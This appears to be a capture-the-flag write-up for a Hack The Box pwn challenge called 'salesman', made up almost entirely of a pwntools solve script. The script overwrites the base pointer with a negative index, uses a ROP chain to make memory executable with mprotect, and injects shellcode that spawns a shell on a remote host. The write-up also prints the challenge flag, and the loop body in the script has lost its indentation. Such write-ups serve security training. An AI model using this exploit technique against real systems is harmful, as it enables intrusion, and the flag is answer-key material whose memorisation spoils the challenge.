I see you are new in town adventurer! Here you can pick whatever you want to continue your journey. Need a pet companion? Our arachnoids are the best. Ready to fight? Our pistols are here for you. Lost in time? Our watch will definately save you!
Category: pwn
Solver: t0b1, s3rp3ntL0v3r
Flag: HTB{00b_4nd_p1v0t_2_th3_st34m_w0rld!}
Writeup
See solve script below.
Solver
from pwn import *
LOCAL = False
HOST = '167.172.52.221'
PORT = 30371
CHALLENGE = './salesman'
context.terminal = ['tmux', 'splitw', '-h']
# context.arch = "amd64"
context.log_level = "info"
context.binary = elf = ELF(CHALLENGE)
re = lambda a: p.recv(a)
reu = lambda a: p.recvuntil(a)
rl = lambda: p.recvline()
s = lambda a: p.send(a)
sl = lambda a: p.sendline(a)
sla = lambda a,b: p.sendlineafter(a,b)
sa = lambda a,b: p.sendafter(a,b)
p = gdb.debug(CHALLENGE, '') if LOCAL else remote(HOST, PORT)
rop = ROP(elf)
rop.mprotect(0x400000, 0x1000, 0x7)
rop.read(0, 0x400000, 0x100)
rop.call(0x400000)
payload = b'A' * 8
payload += rop.chain()
# Overwrite base pointer
sla(b'Item: ', '-2')
sla(b'> ', payload)
# As we overwrite the base pointer and the menu for loop checks
# relative to the $rbp whose memory is initialized with 0,
# we do three rounds instead of two.
for i in range(2):
info(f'Run {i+1}')
sla(b'Item: ', '0')
sla(b'> ', b'a')
info('Done')
info('Done')
shell = asm(shellcraft.sh())
p.sendline(shell)
p.interactive()